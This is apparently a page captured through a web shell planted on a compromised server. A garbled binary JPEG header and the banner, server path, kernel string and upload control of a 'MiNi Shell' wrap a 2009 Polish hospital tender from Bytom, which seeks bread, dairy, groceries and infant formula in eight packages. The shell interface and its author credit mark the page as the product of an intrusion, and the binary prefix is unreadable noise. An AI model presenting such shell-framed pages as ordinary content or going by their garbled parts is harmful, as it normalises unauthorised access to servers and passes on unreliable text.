JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090519/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090519/155016-N-2009.html

<p class="kh_header"><b>Bytom: Przetarg nieograniczony na zakup wraz z dostawą pieczywa, nabiału i art. spożywczych dla potrzeb Kuchni Szpitala  Specjalistycznego  Nr 2  
w  Bytomiu</b><br>
<b>Numer ogłoszenia: 155016 - 2009; data zamieszczenia: 19.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny Nr 2 , ul. Stefana Batorego 15, 41-902 Bytom, woj. śląskie, tel. 032 7861400, faks 032 7861646.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.szpital2.bytom.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na zakup wraz z dostawą pieczywa, nabiału i art. spożywczych dla potrzeb Kuchni Szpitala  Specjalistycznego  Nr 2  
w  Bytomiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia w przetargu nieograniczonym jest zakup wraz z dostawą pieczywa, nabiału i art. spożywczych dla potrzeb Kuchni Szpitala Specjalistycznego Nr 2 
w Bytomiu określonych  przez Zamawiającego według grup asortymentowo - cenowych zgrupowanych w Pakietach  nr 1 - 8 stanowiących załącznik   B   
do SIWZ :
Pakiet nr	1	Pieczywo
Pakiet nr	2	Sucharki
Pakiet nr	3	Art. spożywcze - Ziemniaki
Pakiet nr	4	Art. spożywcze - Różne
Pakiet nr	5	Art. spożywcze - Makaron
Pakiet nr	6	Art. spożywcze - Jajka
Pakiet nr	7	Mleko, masło
Pakiet nr	8	Mleczne odżywki dla dzieci.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.85.11.10-2, 15.33.00.00-0, 15.61.00.00-7, 01.24.20.00-5, 15.41.00.00-5, 15.83.00.00-2, 15.87.00.00-7, 01.11.21.00-6, 15.82.11.50-5, 15.81.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiajacynie wymaga złozenia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> a)posiadają uprawnienia do wykonywania określonej działalności lub czynności       (art. 22 ust 1 pkt 1 pzp), tj.: są uprawnieni do występowania w obrocie prawnym  i prowadzą działalność w zakresie objętym niniejszym zamówieniem, - Wykonawca składa oświadczenie oraz dokumenty określone w § 18 ust. 1 SIWZ
b)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia (art. 22 ust 1 pkt 2 pzp) .  tj.: zapewnią termin dostawy : w ramach pakietu numer 1 - pieczywo - musi się odbywać w każdy dzień tygodnia z wyłączeniem niedzieli do  godz 7:00 ., w ramach pakietu numer 7 - mleko codziennie do 6:00 oprócz niedziel, masło , margaryna 1 raz w tygodniu pozostałe według zapotrzebowania   oraz w ramach pakietów 2 , 3 , 4 , 5  , 6 , 8  - dostawa 3 dni .Wykonawca składa oświadczenie oraz dokumenty określone w § 18 ust. 2 SIWZ
c)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (art. 22 ust 1 pkt 3 pzp), tj. posiadają dostęp do wolnych środków finansowych lub zdolność kredytową w wysokości co najmniej takiej, jak wartość złożonej oferty przy założeniu, że zapłata za zrealizowane zamówienie nastąpi w terminie 30 dni  od daty dostawy i równoczesnego otrzymania faktury - Wykonawca składa oświadczenia oraz dokumenty określone w § 18 ust. 3  SIWZ
d)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 22 ust 1 pkt 4 pzp - Wykonawca składa dokumenty określone w § 18 ust. 1 SIWZ oraz oświadczenie będące załącznikiem nr 3  do SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.W celu potwierdzenia, że Wykonawca ubiegający się o zamówienie publiczne posiada uprawnienia do wykonywania działalności będącej przedmiotem zamówienia oraz, że nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych Zamawiający wymaga :

a)Aktualny - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru  lub zgłoszenia do ewidencji działalności gospodarczej - oryginał lub kopia poświadczona   za zgodność z oryginałem przez podmiot upoważniony do reprezentowania Wykonawcy.
b)W przypadku, gdy Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentu o którym mowa w pkt  a, aktualny dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości  lub jeśli w kraju pochodzenia osoby lub 
w kraju, w którym Wykonawca ma siedzibę  lub miejsce zamieszkania nie wydaje się ww dokumentu - dokument zawierający oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
2.W celu potwierdzenia, niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia Zamawiający wymaga złożenia oświadczenia będącego załącznikiem nr 3 do SIWZ oraz oświadczenie dotyczące terminu wykonania dostawy będącego załącznikiem nr 5 do SIWZ.
3.W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia Zamawiający wymaga:
a)Oświadczenia Wykonawcy o spełnieniu warunków określonych w art. 22 ustawy - prawo zamówień publicznych ( będącego załącznikiem nr 3 do SIWZ )
b)Oświadczenie o stałości cen oraz warunkach płatności wg wzoru stanowiącego załącznik nr 4 do SIWZ.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.szpitalspec2.bytom.ids.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital specjalistyczny numer 2 w Bytomiu ul. St.Batorego 15 , 41-902 Bytom , Sekcja Zamówień Publicznych w cenie 12,20 zł lub nieodpłatnie ze strony internetowej  Zamawiajacego.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2009 godzina 09:00, miejsce: Szpital specjalistyczny numer 2 w Bytomiu ul. St.Batorego 15 , 41-902 Bytom , blok numer 2 ( BUDYNEK DYREKCJI ) pok 16.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 02.07.2009.</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr	1	Pieczywo.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1Chleb pszenno - żytni 1000g, pokrojony, w opakowaniach zabezpieczających przed zanieczyszczeniem	szt 	18 000
2Bułka pszenna- 50g	szt 	160 000
3Weki pszenne, 400g pokrojone, w opakowaniach zabezpieczających przed zanieczyszczeniem	szt 	4 700
4Chałka drożdżowa 300g, pokrojona,  w opakowaniach zabezpieczających przed zanieczyszczeniem	szt 	1 900.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.81.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr	2	Sucharki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1Sucharki luz	kg  150.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.82.11.11-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr	3 Art. spożywcze - Ziemniaki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1Ziemniaki luz	kg	30 000.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.11.21.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr	4 Art. spożywcze - Różne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Bazylia op. 10g	szt.	20
2	Bułka tarta op. 0,5 kg	kg	250
3	Chili op. 20g	szt.	50
4	Chrzan słoik 200g	szt.	250
5	Cukier kryształ paczkowany a 1kg	kg	3700
6	Curry op. 20g	szt.	100
7	Cynamon op. 20g	szt.	40
8	Fasola konserwowana kolorowa op. 400g - Pudliszki	szt.	70
9	Gałka muszkatowa  op.12g	szt.	30
10	Groszek konserwowy op. 400g - Pudliszki	szt.	500
11	Herbata  granulowana op. 80 g	szt.	1100
12	Imbir 20g	szt	20
13	Kasza gryczana op. 1 kg	kg	160
14	Kasza jęczmienna op. 1kg	kg	400
15	Kasza manna op. 1kg	kg	650
16	Kawa zbożowa op. 500g	szt.	750
17	Kisiel op. 60g	szt	800
18	Kminek op. 20g	szt.	70
19	Koncentrat barszczu	szt	20
20	Koncentrat pomidorowy 30% op.200 g - Pudliszki 	szt.	1200
21	Kukurydza konserwowa op. 400g - Pudliszki	szt.	160
22	Kwasek cytrynowy spożywczy op. 20g	szt	70
23	Liście laurowe op. 7g	szt.	140
24	Majeranek op. 16g	szt.	280
25	Mąka  pszenna	kg	1400
26	Mąka ziemniaczana op. 1kg	kg	250
27	Musztarda Roleski op. 200g	szt.	120
28	Ocet spirytusowy 10% op.0,5l	szt.	260
29	Ogórki konserwowe słoik 900g	szt.	150
30	Olej słonecznikowy op. 1 litrowe	butelka	100
31	Olej uniwersalny rzepakowy op. 5 litrowe kujawski 	l	520
32	Oregano op. 10g	szt	30
33	Papryka konserwowa słoik 900g	szt.	120
34	Papryka mielona op. 20 g	szt.	180
35	Pieprz czarny mielony op. 20g	szt.	400
36	Płatki owsiane op. 0,5 kg	szt.	500
37	Przyprawa instant do potraw ( np. Kucharek)	kg	25
38	Przyprawa prowansalska op. 15g	szt.	10
39	Rodzynki op. 100g	szt	20
40	Ryż biały długoziarnisty op. 1kg	kg	1100
41	Sos sojowo-grzybowy but. 150ml	szt	50
42	Sól jodowana op. 1kg	kg	750
43	Ziele angielskie op. 15g	szt.	200
44	Majonez kielecki op 200g	szt.	80
45	Cukier waniliowy 32 g	szt.	20
46	Proszek do pieczenia 36 g	szt.	20
47	Seler konserwowy Rolnik op.480 g	szt.	60
48	Pieprz czarny ziarnisty op.	szt.	150
49	Dżem owocowy Łowicz op. 300g	szt.	100.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr	5 Art. spożywcze - Makaron.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1Makaron bezjajeczny różny luz op. 10 kg	kg	850.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.11.10-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr	6 Art. spożywcze - Jajka.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Jajka średnie klasy A kategoria wagowa L	szt.	12000.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.24.20.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr	7 Mleko, masło.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Mleko 2% tłuszczu folia ( 10 - 15 litrów lub konwia)	l	47000
2	Masło ekstra 82% tłuszczu op. 200g	szt.	16000
3	Margaryna mleczna op. 250g	kg	400
4	Twaróg krajanka półtłusta	kg	200
5	Śmietana 30% tłuszczu folia  0,25 l	l	700
6	Ser podpuszczkowy dojrzewający ( żółty ) tłusty	kg	35
7	Kefir opakowanie do 1 l	l	80.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.88.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr	8	Mleczne odżywki dla dzieci.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Bebiko 1 op. 350g	szt.	220
2	Bebiko 2 op. 350g	szt.	180
3	Bebiko 2R op. 350g	szt.	200
4	Kleik ryżowy op. 170g	szt.	600
5	NAN 1 op. 350g	szt.	600
6	NAN 2 op. 350g	szt.	150
7	NAN 2R op. 350g	szt.	80.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.88.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com